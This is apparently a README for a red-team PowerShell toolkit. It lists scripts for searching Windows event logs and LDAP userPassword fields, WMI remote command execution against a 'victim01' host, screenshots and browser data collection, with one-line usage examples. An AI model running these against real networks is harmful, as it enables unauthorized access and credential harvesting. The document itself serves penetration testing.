Search-EventForUser.ps1: Powershell script that search through the Windows event logs for specific user(s)
Search-FullNameToSamAccount.ps1: Full name to SamAccountName
Search-UserPassword.ps1: Search LDAP for userPassword field
Search-users.ps1: Search-FullNameToSamAccount, Search-EventForUser and Search-UserPassword merged together
Remote-WmiExecute.ps1: Execute command remotely using WMI
Take-Screenshot.ps1: Take a screenshot (PNG)
Get-BrowserHomepage.ps1: Get browser homepage
Get-IEBookmarks.ps1: List all Internet Explorer bookmarks URLs
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
module-import .\Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
module-import .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
module-import .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password "123456"
The -User parameter support single user or a list of users from pipeline
module-import .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
module-import .\Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
module-import .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
module-import .\Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
module-import .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png
module-import .\Get-BrowserHomepage.ps1; Get-BrowserHomepage
module-import .\Get-IEBookmarks.ps1; Get-IEBookmarks
- Remote-WmiExecute.ps1:
- Improve errors handling (Access Denied etc...)
- Take-Screenshot.ps1:
- Handle multiple screens
Charles F. Hamilton Aka Mr.Un1k0d3r RingZer0 Team